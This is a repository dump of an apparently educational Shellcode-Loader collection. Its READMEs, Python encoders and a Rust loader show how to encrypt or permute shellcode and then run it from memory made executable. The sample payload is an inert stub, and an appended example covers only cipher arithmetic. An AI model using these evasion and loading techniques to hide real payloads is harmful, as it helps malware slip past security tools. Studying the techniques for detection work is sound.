8 | 9 | ### Reference 10 | 11 | - [Wiki Tiny Encyrption Algorithm](https://en.wikipedia.org/wiki/Tiny_Encryption_Algorithm) 12 | - [Git Tiny Encyrption Algorithm implementation](https://github.com/ReversingID/Crypto-Reference/blob/master/Codes/Cipher/Block/TEA/TEA.c) -------------------------------------------------------------------------------- /windows/writing/encryption/block/tea/c++/shellcode.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ReversingID/Shellcode-Loader/212d430c7fbb3e9c720d061add121a2d15f7cf47/windows/writing/encryption/block/tea/c++/shellcode.bin -------------------------------------------------------------------------------- /windows/writing/encryption/block/treyfer/README.md: -------------------------------------------------------------------------------- 1 | # Shellcode Loader 2 | 3 | Shellcode encryptoin. 4 | 5 | ### Overview 6 | 7 | Enkripsi `Treyfer` dengan implementasi pribadi tanpa menggunakan API pihak ketiga. 8 | 9 | ### References 10 | 11 | - [Reversing.ID Treyfer Reference](https://github.com/ReversingID/Crypto-Reference/tree/master/References/Modern/Block-Cipher/Treyfer) 12 | - [Wikipedia Treyfer](https://en.wikipedia.org/wiki/Treyfer) -------------------------------------------------------------------------------- /windows/writing/encryption/block/treyfer/c++/shellcode.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ReversingID/Shellcode-Loader/212d430c7fbb3e9c720d061add121a2d15f7cf47/windows/writing/encryption/block/treyfer/c++/shellcode.bin -------------------------------------------------------------------------------- /windows/writing/encryption/block/xtea/README.md: -------------------------------------------------------------------------------- 1 | # Shellcode Loader 2 | 3 | Shellcode encryption. 
4 | 5 | ### Overview 6 | 7 | Menggunakan `eXtended Tiny Encryptio Algorithm (XTEA)` untuk melakukan enkripsi. 8 | 9 | ### References 10 | 11 | - [Reversing.ID XTEA Reference](https://github.com/ReversingID/Crypto-Reference/tree/master/References/Modern/Block-Cipher/XTEA) 12 | - [Reversing.ID XTEA Code](https://github.com/ReversingID/Crypto-Reference/blob/master/Codes/Cipher/Block/XTEA/code.c) -------------------------------------------------------------------------------- /windows/writing/encryption/block/xtea/c++/shellcode.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ReversingID/Shellcode-Loader/212d430c7fbb3e9c720d061add121a2d15f7cf47/windows/writing/encryption/block/xtea/c++/shellcode.bin -------------------------------------------------------------------------------- /windows/writing/encryption/stream/README.md: -------------------------------------------------------------------------------- 1 | # Shellcode Loader 2 | 3 | Enkripsi shellcode dengan stream cipher. 4 | 5 | ### Overview 6 | 7 | Stream cipher adalah jenis algoritma enkripsi kunci simetris dengan menggabungkan plaintext dengan keystream. Dalam stream cipher, setiap byte dalam plaintext dienkripsi satu per satu dengan digit pada ciphertext (stream). 8 | 9 | Algoritma menggunakan kunci simetris dimana kunci yang sama digunakan untuk enkripsi dan dekripsi. -------------------------------------------------------------------------------- /windows/writing/encryption/stream/rc4/SystemFunction/README.md: -------------------------------------------------------------------------------- 1 | # Shellcode Loader 2 | 3 | Shellcode encryption 4 | 5 | ### Overview 6 | 7 | Enkripsi RC4 menggunakan fungsi `SystemFunction032` atau `SystemFunction033` yang merupakan API internal (tak terdokumentasi). 8 | 9 | Fungsi `SystemFunction032` digunakan untuk melakukan enkripsi dan `SystemFunction033` digunakan untuk dekripsi. 
Namun secara internal, keduanya menunjuk pada offset sama sehingga kedua fungsi dapat digunakan untuk melakukan enkripsi dan dekripsi menggunakan key yang sama. 10 | 11 | ```c++ 12 | NTSTATUS SystemFunction032 (struct ustring* data, struct ustring* key); 13 | 14 | NTSTATUS SystemFunction033 (struct ustring* data, struct ustring* key); 15 | 16 | typedef struct 17 | { 18 | DWORD Length; 19 | DWORD MaximumLength; 20 | PVOID Buffer; 21 | } ustring; 22 | ``` 23 | 24 | ### Reference 25 | 26 | - [WineAPI SystemFunction032](https://source.winehq.org/WineAPI/SystemFunction032.html) 27 | - [ReactOS SystemFunction032](https://doxygen.reactos.org/df/d13/sysfunc_8c.html#a66d55017b8625d505bd6c5707bdb9725) -------------------------------------------------------------------------------- /windows/writing/encryption/stream/rc4/SystemFunction/c++/shellcode.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ReversingID/Shellcode-Loader/212d430c7fbb3e9c720d061add121a2d15f7cf47/windows/writing/encryption/stream/rc4/SystemFunction/c++/shellcode.bin -------------------------------------------------------------------------------- /windows/writing/misc/rust/memmap2/Cargo.toml: -------------------------------------------------------------------------------- 1 | [package] 2 | name = "shellcode-loader" 3 | version = "0.1.0" 4 | edition = "2021" 5 | authors = ["Satria Ady Pradana "] 6 | 7 | [dependencies] 8 | memmap2 = "0.9.4" 9 | -------------------------------------------------------------------------------- /windows/writing/misc/rust/memmap2/README.md: -------------------------------------------------------------------------------- 1 | # Shellcode Loader 2 | 3 | ### Overview 4 | 5 | Alokasi area memory dan ubah permissions dengan [memmap2](https://crates.io/crates/memmap2). 
-------------------------------------------------------------------------------- /windows/writing/misc/rust/memmap2/src/main.rs: -------------------------------------------------------------------------------- 1 | /* 2 | Shellcode Loader 3 | Archive of Reversing.ID 4 | 5 | Allocation and change permission with memmap2. 6 | memmap2 is a wrapper to memory operations (not only in windows). 7 | 8 | Compile: 9 | $ cargo build 10 | 11 | Technique: 12 | - allocation: VirtualAlloc 13 | - writing: 14 | - permission: 15 | - execution: unsafe call to function pointer 16 | */ 17 | 18 | use memmap2::MmapOptions; 19 | use std::mem::transmute; 20 | 21 | fn main() { 22 | // shellcode storage in stack 23 | let payload: [u8; 4] = [0x90, 0x90, 0xCC, 0xC3]; 24 | 25 | // allocate memory buffer for payload as READ-WRITE (no executable) 26 | let mut mmap = MmapOptions::new() 27 | .len(payload.len()) 28 | .map_anon() 29 | .expect("[-] unable to allocate"); 30 | 31 | // copy payload to the buffer 32 | mmap.copy_from_slice(&payload); 33 | 34 | // make buffer executable (R-X) 35 | let mmap = mmap 36 | .make_exec() 37 | .expect("[-] unable to change permission"); 38 | 39 | // cast the payload into function and execute 40 | unsafe { 41 | let ep: extern "C" fn() = transmute(mmap.as_ptr()); 42 | ep(); 43 | } 44 | } 45 | -------------------------------------------------------------------------------- /windows/writing/permutation/README.md: -------------------------------------------------------------------------------- 1 | # Shellcode Loader 2 | 3 | ### Overview 4 | 5 | Melakukan shuffle/permutation, mengacak urutan byte shellcode. Penjadwalan urutan berdasarkan seed. 6 | 7 | Shellcode yang tersimpan memiliki format `[Seed] [Encoded Shellcode]`. 
8 | -------------------------------------------------------------------------------- /windows/writing/permutation/column-ordering/README.md: -------------------------------------------------------------------------------- 1 | # Shellcode Loader 2 | 3 | Reordering the shellcode with custom algorithm. 4 | 5 | ### Overview 6 | 7 | Membentuk matrix dan mengatur posisi byte berdasarkan urutan kolom. 8 | 9 | Shellcode yang tersimpan memiliki format `[Key] [Seed] [Encoded Shellcode]`. -------------------------------------------------------------------------------- /windows/writing/permutation/column-ordering/c++/shellcode.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ReversingID/Shellcode-Loader/212d430c7fbb3e9c720d061add121a2d15f7cf47/windows/writing/permutation/column-ordering/c++/shellcode.bin -------------------------------------------------------------------------------- /windows/writing/permutation/fisher-yates/README.md: -------------------------------------------------------------------------------- 1 | # Shellcode Loader 2 | 3 | Reordering the shellcode with custom algorithm. 4 | 5 | ### Overview 6 | 7 | Menggunakan Fisher-Yates Shuffle untuk melakukan permutasi. 
8 | 9 | ### Reference 10 | 11 | - [Wiki Fisher-Yates Shuffle](https://en.wikipedia.org/wiki/Fisher%E2%80%93Yates_shuffle) -------------------------------------------------------------------------------- /windows/writing/permutation/fisher-yates/c++/shellcode.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ReversingID/Shellcode-Loader/212d430c7fbb3e9c720d061add121a2d15f7cf47/windows/writing/permutation/fisher-yates/c++/shellcode.bin -------------------------------------------------------------------------------- /windows/writing/permutation/rail-fence/README.md: -------------------------------------------------------------------------------- 1 | # Shellcode Loader 2 | 3 | Reordering the shellcode with custom algorithm. 4 | 5 | ### Overview 6 | 7 | Mengatur posisi byte dalam shellcode menggunakan algoritma rail-fence (zig-zag) cipher. 8 | 9 | Shellcode yang tersimpan memiliki format `[Key] [Encoded Shellcode]`. 10 | 11 | ### Reference 12 | 13 | - [Wiki Rail-Fence Cipher](https://en.wikipedia.org/wiki/Rail_fence_cipher) 14 | - [online encoder/decoder](https://www.dcode.fr/rail-fence-cipher) -------------------------------------------------------------------------------- /windows/writing/permutation/rail-fence/c++/generate.py: -------------------------------------------------------------------------------- 1 | # read shellcode from `shellcode.bin` and 2 | # generate the encoded shellcode 3 | 4 | import random 5 | 6 | with open("shellcode.bin", "rb") as f: 7 | shcode = f.read() 8 | shlen = len(shcode) 9 | 10 | # encode the shellcode 11 | key = random.randrange(2, 10) 12 | enc_shcode = [key] + [0 for c in range(shlen)] 13 | 14 | p = 1 15 | s = [(key-1)*2, 0] 16 | 17 | for i in range(0, key): 18 | j = i 19 | idx = 0 20 | 21 | while j < shlen: 22 | enc_shcode[p] = shcode[j] 23 | 24 | if s[idx] > 0: 25 | j += s[idx] 26 | p += 1 27 | 28 | idx = (idx + 1) & 1 29 | 30 | s[0] -= 2 31 | s[1] += 2 32 | 33 | # 
print as C-array 34 | print("{ ", end='') 35 | print(",".join("0x{:02x}".format(c) for c in enc_shcode), end='') 36 | print(" }") 37 | print(f"Length: {len(enc_shcode)}") -------------------------------------------------------------------------------- /windows/writing/permutation/rail-fence/c++/shellcode.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ReversingID/Shellcode-Loader/212d430c7fbb3e9c720d061add121a2d15f7cf47/windows/writing/permutation/rail-fence/c++/shellcode.bin -------------------------------------------------------------------------------- /windows/writing/permutation/row-ordering/README.md: -------------------------------------------------------------------------------- 1 | # Shellcode Loader 2 | 3 | Reordering the shellcode with custom algorithm. 4 | 5 | ### Overview 6 | 7 | Membentuk matrix dan mengatur posisi byte berdasarkan urutan baris. 8 | 9 | Shellcode yang tersimpan memiliki format `[Key] [Seed] [Encoded Shellcode]`. -------------------------------------------------------------------------------- /windows/writing/permutation/row-ordering/c++/shellcode.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ReversingID/Shellcode-Loader/212d430c7fbb3e9c720d061add121a2d15f7cf47/windows/writing/permutation/row-ordering/c++/shellcode.bin -------------------------------------------------------------------------------- /windows/writing/permutation/snake/README.md: -------------------------------------------------------------------------------- 1 | # Shellcode Loader 2 | 3 | Reordering the shellcode with custom algorithm. 4 | 5 | ### Overview 6 | 7 | Mengatur posisi byte dalam shellcode dengan pola mengular. 
8 | 9 | contoh: 10 | 11 | ``` 12 | awal: 13 | 1 2 3 4 14 | 5 6 7 8 15 | 9 10 11 12 16 | hasil: 17 | 1 2 3 4 8 7 6 5 9 10 11 12 18 | ``` 19 | 20 | Shellcode yang tersimpan memiliki format `[Key] [Encoded Shellcode]`. 21 | 22 | ### Reference 23 | -------------------------------------------------------------------------------- /windows/writing/permutation/snake/c++/generate.py: -------------------------------------------------------------------------------- 1 | # read shellcode from `shellcode.bin` and 2 | # generate the encoded shellcode 3 | 4 | import random 5 | 6 | with open("shellcode.bin", "rb") as f: 7 | shcode = f.read() 8 | shlen = len(shcode) 9 | 10 | # encode the shellcode 11 | # how many row? 12 | rows = random.randrange(2, 5) 13 | 14 | remainder = shlen % rows 15 | if remainder > 0: 16 | extra = (rows - remainder) 17 | 18 | shlen += extra 19 | shcode += b"\x00" * extra 20 | 21 | cols = shlen // rows 22 | enc_shcode = [rows] 23 | 24 | for r in range(0, rows): 25 | start = r * cols 26 | end = (r + 1) * cols 27 | 28 | shrow = shcode[start:end] 29 | 30 | if r % 2 == 1: 31 | enc_shcode += shrow[::-1] 32 | else: 33 | enc_shcode += shrow 34 | 35 | # print as C-array 36 | print("{ ", end='') 37 | print(",".join("0x{:02x}".format(c) for c in enc_shcode), end='') 38 | print(" }") 39 | print(f"Length: {len(enc_shcode)}") -------------------------------------------------------------------------------- /windows/writing/permutation/snake/c++/shellcode.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ReversingID/Shellcode-Loader/212d430c7fbb3e9c720d061add121a2d15f7cf47/windows/writing/permutation/snake/c++/shellcode.bin -------------------------------------------------------------------------------- /windows/writing/permutation/spiral/README.md: -------------------------------------------------------------------------------- 1 | # Shellcode Loader 2 | 3 | Reordering the shellcode with custom 
algorithm. 4 | 5 | ### Overview 6 | 7 | Mengatur posisi byte dalam shellcode dengan pola spiral. 8 | 9 | contoh: 10 | 11 | ``` 12 | awal: 13 | 1 2 3 4 14 | 5 6 7 8 15 | 9 10 11 12 16 | 13 14 15 16 17 | hasil: 18 | 1 2 3 4 8 12 16 15 14 13 9 5 6 7 11 10 19 | ``` 20 | 21 | Shellcode yang tersimpan memiliki format `[Key] [Encoded Shellcode]`. 22 | 23 | ### Reference 24 | -------------------------------------------------------------------------------- /windows/writing/permutation/spiral/c++/shellcode.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ReversingID/Shellcode-Loader/212d430c7fbb3e9c720d061add121a2d15f7cf47/windows/writing/permutation/spiral/c++/shellcode.bin -------------------------------------------------------------------------------- /windows/writing/substitution/affine-cipher/README.md: -------------------------------------------------------------------------------- 1 | # Shellcode Loader 2 | 3 | Transforming the shellcode by byte substitution. 4 | 5 | ### Overview 6 | 7 | Menggunakan enkripsi klasik Affine Cipher untuk mengganti byte sesuai rumus `(ax + b) mod m` dengan a=197, b=37, m=256. Dekripsi menggunakan rumus `i(y - b) mod m` dengan i merupakan inverse dari a yakni i=13, b=37, dan m=256. -------------------------------------------------------------------------------- /windows/writing/substitution/affine-cipher/c++/shellcode.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ReversingID/Shellcode-Loader/212d430c7fbb3e9c720d061add121a2d15f7cf47/windows/writing/substitution/affine-cipher/c++/shellcode.bin -------------------------------------------------------------------------------- /windows/writing/substitution/atbash/README.md: -------------------------------------------------------------------------------- 1 | # Shellcode Loader 2 | 3 | Transforming the shellcode by byte substitution. 
4 | 5 | ### Overview 6 | 7 | Menggunakan enkripsi klasik Atbash untuk mengganti byte berdasarkan pemetaan alfabet. Rumus matematis untuk enkripsi dan dekripsi (dalam 256 kemungkinan alfabet) adalah: `255-x` -------------------------------------------------------------------------------- /windows/writing/substitution/atbash/c++/shellcode.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ReversingID/Shellcode-Loader/212d430c7fbb3e9c720d061add121a2d15f7cf47/windows/writing/substitution/atbash/c++/shellcode.bin -------------------------------------------------------------------------------- /windows/writing/substitution/hill-cipher/README.md: -------------------------------------------------------------------------------- 1 | # Shellcode Loader 2 | 3 | Transforming the shellcode by byte substitution. 4 | 5 | ### Overview 6 | 7 | Menggunakan enkripsi klasik Hill Cipher untuk mengganti byte melalui perkalian matriks untuk setiap pasang byte. Rumus yang digunakan untuk sample ini adalah matriks `[[197, 0], [0, 173]]` dan matriks invers `[[13, 0], [0, 37]]` -------------------------------------------------------------------------------- /windows/writing/substitution/hill-cipher/c++/shellcode.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ReversingID/Shellcode-Loader/212d430c7fbb3e9c720d061add121a2d15f7cf47/windows/writing/substitution/hill-cipher/c++/shellcode.bin --------------------------------------------------------------------------------
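The Affine and Hill substitutions described in the two READMEs above share one requirement: the multiplier (for Hill, the matrix determinant) must be invertible modulo 256, which over bytes simply means it must be odd. The following added Python example (not the project's code) derives the inverses from the stated parameters a=197, b=37 and `[[197, 0], [0, 173]]` instead of hard-coding them, checks that they equal the README's i=13 and `[[13, 0], [0, 37]]`, round-trips a constructed byte sample, and also handles non-diagonal Hill keys, which the page's sample does not use.

```python
# Added example (not code from the Shellcode-Loader project): the Z_256 arithmetic behind
# the Affine and Hill byte substitutions. Parameters come from the READMEs; the inverses are
# computed so the same functions validate any parameter set, not only the sample ones.

M = 256  # the byte "alphabet"


def mod_inverse(a, m=M):
    """Multiplicative inverse of a modulo m via the extended Euclidean algorithm.

    Raises ValueError when gcd(a, m) != 1. For m = 256 that is every even a: an even
    multiplier is not a bijection on bytes, so such a key could not be decrypted uniquely.
    """
    old_r, r = a % m, m
    old_s, s = 1, 0
    while r:
        q = old_r // r
        old_r, r = r, old_r - q * r
        old_s, s = s, old_s - q * s
    if old_r != 1:
        raise ValueError(f"{a} is not invertible modulo {m}")
    return old_s % m


def affine_encrypt(data, a=197, b=37):
    """y = (a*x + b) mod 256 for every byte; rejects a non-invertible a up front."""
    mod_inverse(a)
    return bytes((a * x + b) % M for x in data)


def affine_decrypt(data, a=197, b=37):
    """x = i*(y - b) mod 256 with i = a^-1 mod 256 (13 for a = 197)."""
    i = mod_inverse(a)
    return bytes((i * (y - b)) % M for y in data)


def hill_inverse(k):
    """Inverse of a 2x2 key matrix over Z_256: det^-1 * adjugate.

    For the README's diagonal key [[197, 0], [0, 173]] this yields [[13, 0], [0, 37]];
    the same formula covers non-diagonal keys as long as the determinant is odd.
    """
    (k00, k01), (k10, k11) = k
    det_inv = mod_inverse((k00 * k11 - k01 * k10) % M)
    return ((det_inv * k11 % M, -det_inv * k01 % M),
            (-det_inv * k10 % M, det_inv * k00 % M))


def hill_apply(data, k):
    """Multiply each byte pair (x0, x1), taken as a column vector, by k modulo 256."""
    if len(data) % 2:
        raise ValueError("Hill cipher over byte pairs needs an even-length input")
    (k00, k01), (k10, k11) = k
    out = bytearray()
    for x0, x1 in zip(data[0::2], data[1::2]):
        out.append((k00 * x0 + k01 * x1) % M)
        out.append((k10 * x0 + k11 * x1) % M)
    return bytes(out)


HILL_KEY = ((197, 0), (0, 173))  # sample key from the hill-cipher README


def hill_encrypt(data, k=HILL_KEY):
    return hill_apply(data, k)


def hill_decrypt(data, k=HILL_KEY):
    return hill_apply(data, hill_inverse(k))


if __name__ == "__main__":
    sample = bytes(range(256))  # constructed input: every byte value exactly once
    assert affine_decrypt(affine_encrypt(sample)) == sample
    assert hill_decrypt(hill_encrypt(sample)) == sample
    print("a^-1 mod 256 =", mod_inverse(197), "| K^-1 =", hill_inverse(HILL_KEY))
```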